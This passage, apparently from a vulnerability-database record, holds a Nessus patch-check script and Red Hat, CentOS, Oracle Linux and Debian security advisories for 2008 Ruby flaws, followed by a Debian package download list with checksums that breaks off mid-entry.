script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(20, 189, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-test-suite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", 
reference:\"ruby-devel-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-doc-html-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-doc-ri-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-examples-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-test-suite-1.8.6.p369-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"ruby-tk-1.8.6.p369-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. 
If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2018-03-14T19:26:59", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0895", "href": "https://access.redhat.com/errata/RHSA-2008:0895", "type": "redhat", "title": "(RHSA-2008:0895) Moderate: ruby security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:15", "bulletinFamily": "unix", "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. 
If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2017-07-28T18:43:40", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0896", "href": "https://access.redhat.com/errata/RHSA-2008:0896", "type": "redhat", "title": "(RHSA-2008:0896) Moderate: ruby security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:40", "bulletinFamily": "unix", "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of service\nattack via XML documents with large XML entity definitions recursion. A\nspecially-crafted XML file could cause a Ruby application using the REXML\nmodule to use an excessive amount of CPU and memory. (CVE-2008-3790)\n\nAn insufficient \"taintness\" check flaw was discovered in Ruby's DL module,\nwhich provides direct access to the C language functions. An attacker could\nuse this flaw to bypass intended safe-level restrictions by calling\nexternal C functions with the arguments from an untrusted tainted inputs.\n(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially-crafted HTTP request to a\nWEBrick server that would cause the server to use an excessive amount of\nCPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby. 
It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2017-09-08T11:51:21", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0897", "href": "https://access.redhat.com/errata/RHSA-2008:0897", "type": "redhat", "title": "(RHSA-2008:0897) Moderate: ruby security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2019-05-29T18:35:30", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2008:0895-02\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. 
If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015336.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-libs\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2008-10-22T04:31:37", "published": "2008-10-22T04:31:37", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html", "id": "CESA-2008:0895-02", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:58", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2008:0896\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. 
If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015332.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015333.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015343.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015347.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-libs\nruby-mode\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0896.html", "modified": "2008-10-24T18:02:11", "published": "2008-10-21T16:06:28", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/015332.html", "id": "CESA-2008:0896", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2008:0897\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of service\nattack via XML documents with large XML entity definitions recursion. A\nspecially-crafted XML file could cause a Ruby application using the REXML\nmodule to use an excessive amount of CPU and memory. (CVE-2008-3790)\n\nAn insufficient \"taintness\" check flaw was discovered in Ruby's DL module,\nwhich provides direct access to the C language functions. 
An attacker could\nuse this flaw to bypass intended safe-level restrictions by calling\nexternal C functions with the arguments from an untrusted tainted inputs.\n(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially-crafted HTTP request to a\nWEBrick server that would cause the server to use an excessive amount of\nCPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015340.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015341.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015345.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015349.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015354.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015355.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-irb\nruby-libs\nruby-mode\nruby-rdoc\nruby-ri\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0897.html", "modified": "2008-10-28T10:37:20", "published": "2008-10-24T00:04:31", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/015340.html", "id": "CESA-2008:0897", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.8, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:25", "bulletinFamily": "unix", "description": "[1.6.8-13.el3]\n- security fixes. (#461578)\n- CVE-2008-3655: multiple insufficient safe mode restrictions\n- CVE-2008-3443: Memory allocation failure in Ruby regex engine (remotely exploitable DoS)\n- CVE-2008-3905: use of predictable source port and transaction\n id in DNS requests done by resolv.rb module.", "modified": "2008-10-21T00:00:00", "published": "2008-10-21T00:00:00", "id": "ELSA-2008-0896", "href": "http://linux.oracle.com/errata/ELSA-2008-0896.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "unix", "description": "[1.8.5-5.el5_2.5]\n- Build with -fno-strict-aliasing.\n[1.8.5-5.el5_2.4]\n- security fixes. (#461590)\n- CVE-2008-3655: multiple insufficient safe mode restrictions.\n- CVE-2008-3656: WEBrick DoS vulnerability (CPU consumption).\n- CVE-2008-3657: missing taintness checks in dl module.\n- CVE-2008-3905: use of predictable source port and transaction id in DNS\n requests done by resolv.rb module.\n- CVE-2008-3443: Memory allocation failure in Ruby regex engine\n (remotely exploitable DoS).\n- CVE-2008-3790: DoS vulnerability in the REXML module.", "modified": "2008-10-21T00:00:00", "published": "2008-10-21T00:00:00", "id": "ELSA-2008-0897", "href": "http://linux.oracle.com/errata/ELSA-2008-0897.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:49", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1695-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJanuary 02, 2009 http://www.debian.org/security/faq\n- 
------------------------------------------------------------------------\n\nPackage : ruby1.8, ruby1.9\nVulnerability : memory leak\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2008-3443\nDebian Bug : 494401\n\nThe regular expression engine of Ruby, a scripting language, contains a\nmemory leak which can be triggered remotely under certain circumstances,\nleading to a denial of service condition (CVE-2008-3443).\n\nIn addition, this security update addresses a regression in the REXML\nXML parser of the ruby1.8 package; the regression was introduced in\nDSA-1651-1.\n\nFor the stable distribution (etch), this problem has been fixed in version\n1.8.5-4etch4 of the ruby1.8 package, and version 1.9.0+20060609-1etch4\nof the ruby1.9 package.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.8.7.72-1 of the ruby1.8 package. The ruby1.9 package will be\nfixed soon.\n\nWe recommend that you upgrade your Ruby packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz\n Size/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.dsc\n Size/MD5 checksum: 1102 1c38e939e74513153ee6677ef9f85b0d\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.diff.gz\n Size/MD5 checksum: 176939 2fea21ebd5e29d26714843fa415d6310\n 
http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.diff.gz\n Size/MD5 checksum: 32843 859c9ba559722e156d6931f3c8c347a4\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz\n Size/MD5 checksum: 4450198 483d9b46a973c7e14f7586f0b1129891\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.dsc\n Size/MD5 checksum: 1379 cbcf9f41397f2658e1db5ebae0178ccd\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 265870 fc302abc0465ab56ccd16fc0e724885c\n http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 255764 40a840e93b23abfe83f06fb68e411ecc\n http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 309788 1a32b37a2ae266825239d31479481202\n http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 1232694 0f2de56be8bf69925bdd69c0ebdb6e88\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 229450 c445df6488d98bba432cad422b2d26d2\n http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 694310 ba20a22e37fe3128ba68065e81b34be2\n http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 318608 107093187b68a01e89937e5595ada72f\n http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 235540 742511548e73ce861aec2ebced3bb820\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 210174 3f151d4c5e251849b7bc82a4c0cc6717\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 243302 
af6b1eacf4c03bc3fe53e3c2a8e13044\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 199212 7450977513c7006dd667426d5499092c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 324692 f53f9acfd76ea3a29a8ef4892f2b573a\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 237774 e9a60d0d7c8f73357b09bb6188070e21\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 217606 1479ee1a4b51cb0a75783b2f3844723b\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 219472 952a4e672625ce7f2529493b00364604\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 301142 fb710ce9d21ff1fb7f8a3808fcb78d60\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 216946 515718544ab0101093c6a57e63cb1cb8\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 903520 d39e018101c51c880e2cd9895a88a1f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 961022 f6d226e51af5740c5bda5772cf20e8a8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 217630 292a9b82a47bd1bc3c7b4ab440029cca\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 198300 653c076799344535ac9b6a791ffb132d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 1881422 
2eb8f5dd96ced6eac7473eed467c5663\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 1869092 3d45f58f803de6208f28d5267be89ecf\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 199236 81f0b4078e9412536836f8b973756318\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 1074308 f3ec5b9b0349dbc5ef735942a997327c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 1890052 5779555b10f64a438773cbf048ac545c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 340202 69dd9f78aca79c5e05b191d7163a01b4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 1638634 ed825a333226565b4b98b32b93cd1fe6\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 807592 464c13292ce358b22247cc998f743562\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 216630 867bdeff043830d6bad157d1931dc948\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 235632 c4ad4cb0bb9cd697534a2c262100c6cc\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 198112 17cd7156a45a5aff5c27d82e268a3c4d\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 1070604 1bddf59e7b60371ff8099b08bf75ac30\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 1850656 aa571b58631a8557f7019d592636f481\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 749162 af403f99a95355682a54909929e5199a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 216080 a43f4b0559aa2c9b50ea5d7973162aa2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 197652 a9e00dc85e9f2cae38eb09e899130248\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 217322 9e02a9f097c955e4400812f0c04d7508\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 1830274 53805790080b4cd1daf1a4d63ed8256c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 1878288 01c7b13369a8758303404727fea129fd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 301112 987113850c63d29874841e5faff83d89\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 198726 4d65ce2e10feab441a946a18023daf42\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 216568 93fe5252d04959e64dc6576d95b7c2b6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 1584216 69ed7f6bca37c0c549bf528f773e2900\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 323450 5baea37cc897959fc20d48ac89de0d74\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 345864 c39d9b07d0cb6e4099ca3efeafb5fa6e\n\narm architecture (ARM)\n\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 1526984 0e6ab8221858243c7145bbc41ecb4e8f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 365056 66c7f98e2bb319a62ee7c4c92672c731\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 196710 9e8c6e4cb718dc719e8fde6b26f962e4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 991516 14a9b5cbf719d62dc8353a51afb555a9\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 1859122 e0c7c1e7d2ccf0e49bce45e7e7bf1278\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 1792772 d56d498189d5406b5020d9d924117e7c\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 197418 d26ec8fb413c9ebab080bedea93722b1\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 197808 a36c730da4bcea2d72f5d370322eb30f\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 792994 579ec1a30cd9a1cbd8bf67aa06dc4d24\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 697246 ca45d9a326d51f5434d1621abcece266\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 216240 423493a419191c35b8b3e80a1f1f1c9c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 216324 a266f8778f5e7d613db6ba3f15adb763\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 
checksum: 237202 5fc7e98291401cd3fe917ed05d9bd015\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 287576 eced197b837fe4d62c03b20bed6815be\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 1876264 bc351c3337a5d5987f6ddb836768922e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 219386 3f0b1eb14311c982d63ebd0fab64f5f4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 215572 2c0ccc988ac6ea3250f8dc367ccaa2a2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 311564 8dfe07d2f7dcf8275e8ad8f41dcda0c0\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 218160 513b9ae768f77d80a13fa851e1c8f4f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 824152 6146a8f873531c0ed8cf0d06d2e17d2c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 395602 